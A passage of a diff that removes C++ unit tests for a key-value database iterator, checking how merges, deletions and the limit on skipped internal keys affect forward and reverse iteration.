-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t i = 0; i < 200; ++i) {
-        internal_iter->AddDeletion("c");
-      }
-      internal_iter->AddPut("c", "200");
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, 202,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), "200");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddDeletion("c");
-      }
-      internal_iter->AddPut("c", "200");
-      internal_iter->Finish();
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(!db_iter->Valid());
-
-      db_iter->SeekToFirst();
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    for (size_t i = 0; i < 200; ++i) {
-      internal_iter->AddDeletion("c");
-    }
-    internal_iter->AddPut("c", "200");
-    internal_iter->Finish();
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      200, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "200");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "200");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddPut("d", ToString(k));
-      }
-
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddPut("c", ToString(k));
-      }
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "d");
-      ASSERT_EQ(db_iter->value().ToString(), ToString(i));
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "b");
-      internal_iter->AddMerge("a", "a");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddMerge("c", ToString(k));
-      }
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      std::string merge_result = "0";
-      for (size_t j = 1; j <= i; ++j) {
-        merge_result += "," + ToString(j);
-      }
-      ASSERT_EQ(db_iter->value().ToString(), merge_result);
-
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "b");
-
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "a");
-
-      db_iter->Prev();
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) {
-  Options options;
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-  ReadOptions ro;
-
-  // Basic test case ... Make sure explicityly passing the default value works.
-  // Skipping internal keys is disabled by default, when the value is 0.
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 0;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "val_d");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "val_d");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-  }
-
-  // Test to make sure that the request will *not* fail as incomplete if
-  // num_internal_keys_skipped is *equal* to max_skippable_internal_keys
-  // threshold. (It will fail as incomplete only when the threshold is
-  // exceeded.)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-  }
-
-  // Fail the request as incomplete when num_internal_keys_skipped >
-  // max_skippable_internal_keys
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test that the num_internal_keys_skipped counter resets after a successful
-  // read.
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Next();  // num_internal_keys_skipped counter resets here.
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test that the num_internal_keys_skipped counter resets after a successful
-  // read.
-  // Reverse direction
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "e");
-    ASSERT_EQ(db_iter->value().ToString(), "val_e");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();  // num_internal_keys_skipped counter resets here.
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test that skipping separate keys is handled
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "e");
-    ASSERT_EQ(db_iter->value().ToString(), "val_e");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test if alternating puts and deletes of the same key are handled correctly.
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "e");
-    ASSERT_EQ(db_iter->value().ToString(), "val_e");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test for large number of skippable internal keys with *default*
-  // max_sequential_skip_in_iterations.
-  {
-    for (size_t i = 1; i <= 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddPut("a", "val_a");
-      for (size_t j = 1; j <= i; ++j) {
-        internal_iter->AddPut("b", "val_b");
-        internal_iter->AddDeletion("b");
-      }
-      internal_iter->AddPut("c", "val_c");
-      internal_iter->Finish();
-
-      ro.max_skippable_internal_keys = i;
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1,
-          options.max_sequential_skip_in_iterations));
-
-      db_iter->SeekToFirst();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-      db_iter->Next();
-      if ((options.max_sequential_skip_in_iterations + 1) >=
-          ro.max_skippable_internal_keys) {
-        ASSERT_TRUE(!db_iter->Valid());
-        ASSERT_TRUE(db_iter->status().IsIncomplete());
-      } else {
-        ASSERT_TRUE(db_iter->Valid());
-        ASSERT_EQ(db_iter->key().ToString(), "c");
-        ASSERT_EQ(db_iter->value().ToString(), "val_c");
-      }
-
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-      db_iter->Prev();
-      if ((options.max_sequential_skip_in_iterations + 1) >=
-          ro.max_skippable_internal_keys) {
-        ASSERT_TRUE(!db_iter->Valid());
-        ASSERT_TRUE(db_iter->status().IsIncomplete());
-      } else {
-        ASSERT_TRUE(db_iter->Valid());
-        ASSERT_EQ(db_iter->key().ToString(), "a");
-        ASSERT_EQ(db_iter->value().ToString(), "val_a");
-      }
-    }
-  }
-
-  // Test for large number of skippable internal keys with a *non-default*
-  // max_sequential_skip_in_iterations.
-  {
-    for (size_t i = 1; i <= 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddPut("a", "val_a");
-      for (size_t j = 1; j <= i; ++j) {
-        internal_iter->AddPut("b", "val_b");
-        internal_iter->AddDeletion("b");
-      }
-      internal_iter->AddPut("c", "val_c");
-      internal_iter->Finish();
-
-      options.max_sequential_skip_in_iterations = 1000;
-      ro.max_skippable_internal_keys = i;
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1,
-          options.max_sequential_skip_in_iterations));
-
-      db_iter->SeekToFirst();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-      db_iter->Next();
-      ASSERT_TRUE(!db_iter->Valid());
-      ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-      db_iter->Prev();
-      ASSERT_TRUE(!db_iter->Valid());
-      ASSERT_TRUE(db_iter->status().IsIncomplete());
-    }
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator1) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 1, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  db_iter->Next();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator2) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 0, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(!db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator3) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 2, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(!db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator4) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 4, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0,1");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-  db_iter->Next();
-  ASSERT_TRUE(!db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator5) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      1, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2,merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      3, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1,merge_4");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      5, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1,merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      6, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1,merge_4,merge_5,merge_6");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    // put, singledelete, merge
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddSingleDeletion("a");
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-    db_iter->Seek("b");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator6) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
